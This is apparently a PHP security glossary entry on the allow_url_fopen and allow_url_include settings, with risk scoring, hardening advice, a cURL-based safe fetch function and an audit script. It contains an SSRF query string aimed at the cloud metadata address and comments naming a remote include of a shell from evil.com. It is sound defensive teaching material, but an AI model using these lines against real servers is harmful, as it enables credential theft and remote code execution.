
allow_url_fopen / allow_url_include

PHP CWE-98 OWASP A5:2021 CVSS 9.8 PHP 5.0+ Intermediate
debt(d5/e3/b3/t6)
d5 Detectability Operational debt — how invisible misuse is to your safety net

Closest to 'specialist tool catches it' (d5). The detection_hints list semgrep and lynis as tools that can flag allow_url_fopen=On in config or usage of file_get_contents with URLs. These are specialist security scanning tools, not default linters. A default PHP linter won't flag this — you need SAST or a hardening auditor to catch it systematically.

e3 Effort Remediation debt — work required to fix once spotted

Closest to 'simple parameterised fix' (e3). The quick_fix is to set allow_url_fopen=Off in php.ini and replace file_get_contents() URL calls with cURL. The ini change is one line, but replacing file_get_contents URL usages across a codebase requires a small but systematic refactor — swapping each call to use cURL or an HTTP client. This is more than e1 but stays within a single concern/component pattern, so e3 fits.

b3 Burden Structural debt — long-term weight of choosing wrong

Closest to 'localised tax' (b3). This is a php.ini configuration setting that affects file-wrapper-based URL functions. It's not load-bearing across the architecture — it's a localized configuration concern. However, it applies to both web and CLI contexts and legacy code may have scattered file_get_contents URL calls that implicitly depend on it being On, creating a mild ongoing tax. Still, it doesn't shape the system's architecture, so b3 is appropriate.

t6 Trap Cognitive debt — how counter-intuitive correct behaviour is

Closest to 'notable trap' (t5), +1 to t6. The misconception is significant: developers commonly believe disabling allow_url_fopen prevents all remote HTTP requests from PHP, when it only affects URL-aware file functions and leaves cURL completely unaffected. Additionally, common_mistakes reveal that developers don't realize allow_url_fopen interacts with allow_url_include to affect include/require statements — a compounding surprise. This goes beyond a single documented gotcha (t5) but doesn't quite reach 'contradicts how a similar concept works elsewhere' (t7), so t6 is warranted.


Also Known As

allow_url_fopen setting, remote file open, URL file wrapper

TL;DR

PHP INI settings that permit file functions and include/require to load remote URLs — a major SSRF and RFI enabler.

Explanation

allow_url_fopen permits file_get_contents(), fopen(), and similar functions to fetch remote HTTP/FTP URLs. allow_url_include goes further, enabling include() and require() to load remote scripts — enabling Remote File Inclusion (RFI) attacks where an attacker includes and executes a PHP file from an attacker-controlled server. Both settings should be disabled in production (allow_url_fopen = Off, allow_url_include = Off) unless remote fetching is explicitly required, in which case use cURL with strict URL validation instead.
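As an added example that is not part of this glossary entry, the following PHP implements the "use cURL with strict URL validation" advice above and closes the `file_get_contents($userInput)` hole listed under Common Mistakes. The function names `validateOutboundUrl()` and `fetchRemote()`, the `$allowedHosts` allow-list and the timeout and size limits are assumptions chosen for the illustration.

```php
<?php
// Added example, not code from the glossary entry. Replaces file_get_contents($url)
// with a cURL fetch that refuses anything but https to an allow-listed host that
// resolves to a public address. validateOutboundUrl(), fetchRemote() and
// $allowedHosts are names chosen here; the limits are illustrative.

declare(strict_types=1);

/**
 * Returns [host, port, ip] for a URL that passes policy, or throws.
 * The resolved IP is returned so the caller can pin it for the connection:
 * validating DNS and then letting cURL resolve again would leave a rebinding window.
 */
function validateOutboundUrl(string $url, array $allowedHosts): array
{
    $p = parse_url($url);
    if ($p === false || !isset($p['scheme'], $p['host'])) {
        throw new InvalidArgumentException('Malformed URL');
    }
    if (strtolower($p['scheme']) !== 'https') {
        throw new InvalidArgumentException('Only https:// is permitted (no file://, php://, ftp://)');
    }
    if (isset($p['user']) || isset($p['pass'])) {
        throw new InvalidArgumentException('Credentials embedded in the URL are not permitted');
    }
    $host = strtolower($p['host']);
    if (!in_array($host, $allowedHosts, true)) {
        throw new InvalidArgumentException("Host not on the allow-list: $host");
    }
    // gethostbynamel() returns IPv4 addresses only; an IPv6-capable deployment would
    // also query dns_get_record($host, DNS_AAAA) and apply the same filter.
    $ips = gethostbynamel($host);
    if ($ips === false || $ips === []) {
        throw new RuntimeException("Cannot resolve $host");
    }
    foreach ($ips as $ip) {
        // NO_PRIV_RANGE drops 10/8, 172.16/12, 192.168/16; NO_RES_RANGE drops
        // 127/8, 169.254/16 (cloud metadata), 0/8 and 240/4.
        if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) === false) {
            throw new RuntimeException("$host resolves to a non-public address ($ip)");
        }
    }
    return [$host, $p['port'] ?? 443, $ips[0]];
}

function fetchRemote(string $url, array $allowedHosts): string
{
    [$host, $port, $ip] = validateOutboundUrl($url, $allowedHosts);
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => false,               // a redirect could point at an internal host
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTPS,     // no scheme downgrade
        CURLOPT_RESOLVE        => ["$host:$port:$ip"], // pin the address we just vetted
        CURLOPT_CONNECTTIMEOUT => 3,
        CURLOPT_TIMEOUT        => 5,
        CURLOPT_SSL_VERIFYPEER => true,
        CURLOPT_SSL_VERIFYHOST => 2,
        CURLOPT_MAXFILESIZE    => 1000000,             // only enforced when Content-Length is sent
    ]);
    $body   = curl_exec($ch);
    $status = curl_getinfo($ch, CURLINFO_RESPONSE_CODE);
    $error  = curl_error($ch);
    curl_close($ch);
    if ($body === false) {
        throw new RuntimeException("Request failed: $error");
    }
    if ($status !== 200) {
        throw new RuntimeException("Unexpected HTTP status $status");
    }
    return $body;
}

// Usage: the allow-list is application policy, kept out of user reach.
// $data = fetchRemote($_GET['source'], ['api.example.com']);  // throws for http://, file://, metadata IPs, unknown hosts
```

Two design points: redirects are disabled rather than followed with re-validation, because a 302 to an internal address is the classic way an allow-listed host is turned into an SSRF pivot; and the vetted IP is pinned with CURLOPT_RESOLVE so the DNS answer checked by `validateOutboundUrl()` is the one actually connected to. None of this depends on allow_url_fopen, which is why the setting can stay Off.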

Common Misconception

Disabling allow_url_fopen prevents all remote HTTP requests from PHP. It only affects URL-aware file functions like file_get_contents() with a URL — cURL is completely unaffected and can still make outbound requests regardless of this setting.

Why It Matters

allow_url_fopen enables PHP's file functions to fetch remote URLs — combined with user-controlled paths, it enables SSRF and remote file inclusion vulnerabilities.

Common Mistakes

  • Leaving allow_url_fopen enabled in production when it is only needed in specific scripts.
  • Using file_get_contents($userInput) where user input can be a URL — SSRF via allow_url_fopen.
  • Not realising that allow_url_fopen affects include/require when allow_url_include is also enabled.
  • Believing that allow_url_fopen is safe because you only call it with known paths — input sanitisation can be bypassed.

Avoid When

  • Any production web application — allow_url_fopen enables remote file inclusion vulnerabilities if user input reaches file functions.
  • When Guzzle, cURL, or any HTTP client library is available — use them instead for explicit, safe HTTP calls.
  • Shared hosting environments where you cannot control what other tenants do with the setting.

When To Use

  • Strictly controlled CLI scripts on trusted infrastructure where input is never user-supplied.
  • Legacy code that cannot yet be refactored — disable it in php.ini and enable only where truly required.
  • Never use with user-supplied file paths — always use explicit HTTP client libraries for remote requests.

Code Examples

✗ Vulnerable
// allow_url_fopen=On in php.ini enables this SSRF:
$content = file_get_contents($_GET['source']);
// ?source=http://169.254.169.254/latest/meta-data/ — AWS metadata
✓ Fixed
; php.ini
allow_url_fopen   = Off  ; prevents file_get_contents('http://evil.com/shell.php')
allow_url_include = Off  ; prevents include('http://evil.com/shell.php') — critical

// For HTTP requests, use GuzzleHTTP — explicit, configurable, auditable:
use GuzzleHttp\Client;
$client   = new Client(['timeout' => 5, 'verify' => true]);
$response = $client->get('https://api.example.com/data');
$body     = (string) $response->getBody();

Added 15 Mar 2026
Edited 25 Mar 2026
DEV INTEL Tools & Severity
🟠 High ⚙ Fix effort: Low
⚡ Quick Fix
Set allow_url_fopen=Off in production php.ini — use cURL explicitly instead, which gives you full control over timeouts, TLS verification, and redirect following
📦 Applies To
PHP 5.0+ web cli
🔍 Detection Hints
allow_url_fopen=On in production; file_get_contents('http://...') for external requests; no timeout on URL fetch via file wrappers
Auto-detectable: ✓ Yes semgrep lynis
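The detection hints above can be checked without a full SAST product. The following audit script is an added example, not tooling from this glossary or from semgrep or lynis: it reads the running interpreter's ini values and tokenizes PHP sources to find URL-aware file functions or include/require fed a URL literal or a superglobal. The function names, the scanned function list and the `$sample` source it falls back to are constructed for the illustration.

```php
<?php
// Added example, not the glossary's tooling. Run as: php audit.php /path/to/src
// With no argument it scans the constructed $sample below so it demonstrates itself.

declare(strict_types=1);

const URL_AWARE_FUNCS = ['file_get_contents', 'fopen', 'file', 'readfile', 'copy', 'simplexml_load_file'];
const INCLUDE_TOKENS  = [T_INCLUDE, T_INCLUDE_ONCE, T_REQUIRE, T_REQUIRE_ONCE];
const SUPERGLOBALS    = ['$_GET', '$_POST', '$_REQUEST', '$_COOKIE', '$_FILES'];
const URL_LITERAL_RE  = '#[\'"]\s*(https?|ftp|php|data|expect|phar)://#i';

/** Ini values that should be Off in production. Both are PHP_INI_SYSTEM, so ini_set() cannot fix them. */
function auditIni(): array
{
    $findings = [];
    foreach (['allow_url_fopen', 'allow_url_include'] as $key) {
        if (filter_var(ini_get($key), FILTER_VALIDATE_BOOLEAN)) {
            $findings[] = "$key is On; set $key = Off in php.ini";
        }
    }
    return $findings;
}

/** True when the name token at $i is a plain function call, not a method, constant or definition. */
function isCallSite(array $tokens, int $i): bool
{
    $prev = $tokens[$i - 1] ?? null;
    if (is_array($prev) && $prev[0] === T_WHITESPACE) { $prev = $tokens[$i - 2] ?? null; }
    if (is_array($prev) && in_array($prev[0], [T_OBJECT_OPERATOR, T_DOUBLE_COLON, T_FUNCTION, T_NEW], true)) {
        return false;
    }
    $next = $tokens[$i + 1] ?? null;
    if (is_array($next) && $next[0] === T_WHITESPACE) { $next = $tokens[$i + 2] ?? null; }
    return $next === '(';
}

/** Tokenize one PHP source and return "file:line: message" findings. */
function scanSource(string $code, string $file): array
{
    $findings = [];
    $tokens = token_get_all($code);
    $n = count($tokens);
    for ($i = 0; $i < $n; $i++) {
        $tok = $tokens[$i];
        if (!is_array($tok)) { continue; }
        [$id, $text, $line] = $tok;
        // PHP 8 tokenizes \file_get_contents as T_NAME_FULLY_QUALIFIED; older versions use T_STRING.
        $isName = $id === T_STRING || (defined('T_NAME_FULLY_QUALIFIED') && $id === T_NAME_FULLY_QUALIFIED);
        $name = ltrim(strtolower($text), '\\');
        $isInclude = in_array($id, INCLUDE_TOKENS, true);
        $isFunc = $isName && in_array($name, URL_AWARE_FUNCS, true) && isCallSite($tokens, $i);
        if (!$isInclude && !$isFunc) { continue; }
        // Collect the rest of the statement as text and look for the risky argument shapes.
        $stmt = '';
        for ($j = $i + 1; $j < $n && $tokens[$j] !== ';'; $j++) {
            $stmt .= is_array($tokens[$j]) ? $tokens[$j][1] : $tokens[$j];
        }
        $what = $isInclude ? $name : "$name()";
        if (preg_match(URL_LITERAL_RE, $stmt)) {
            $findings[] = "$file:$line: $what with a URL literal (depends on allow_url_fopen"
                . ($isInclude ? '/allow_url_include' : '') . ')';
        }
        foreach (SUPERGLOBALS as $sg) {
            if (strpos($stmt, $sg) !== false) {
                $findings[] = "$file:$line: $what reads $sg (user-controlled path: SSRF"
                    . ($isInclude ? '/RFI' : '') . ')';
                break;
            }
        }
    }
    return $findings;
}

// Constructed sample so the script has something to report when run with no arguments.
$sample = <<<'PHP'
<?php
$c = file_get_contents($_GET['source']);
$x = file_get_contents('http://example.invalid/feed.xml');
include $_REQUEST['page'];
$local = file_get_contents(__DIR__ . '/config.json');   // local path: not reported
PHP;

$findings = auditIni();
if (isset($argv[1]) && is_dir($argv[1])) {
    $it = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($argv[1], FilesystemIterator::SKIP_DOTS));
    foreach ($it as $f) {
        if ($f->getExtension() === 'php') {
            $findings = array_merge($findings, scanSource((string) file_get_contents($f->getPathname()), $f->getPathname()));
        }
    }
} else {
    $findings = array_merge($findings, scanSource($sample, 'sample.php'));
}
foreach ($findings as $finding) { echo $finding, PHP_EOL; }
exit($findings === [] ? 0 : 1);
```

The non-zero exit status lets the script run as a CI gate. The token scan is deliberately conservative: it reports only a URL literal or a superglobal inside the same statement, so a path that passes through a variable first is missed (that is the gap a real SAST rule with taint tracking closes), but every hit it does report is one of the exact shapes the detection hints describe.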
🤖 AI Agent
Confidence: High False Positives: Low ✓ Auto-fixable Fix: Low Context: Line
CWE-441 CWE-918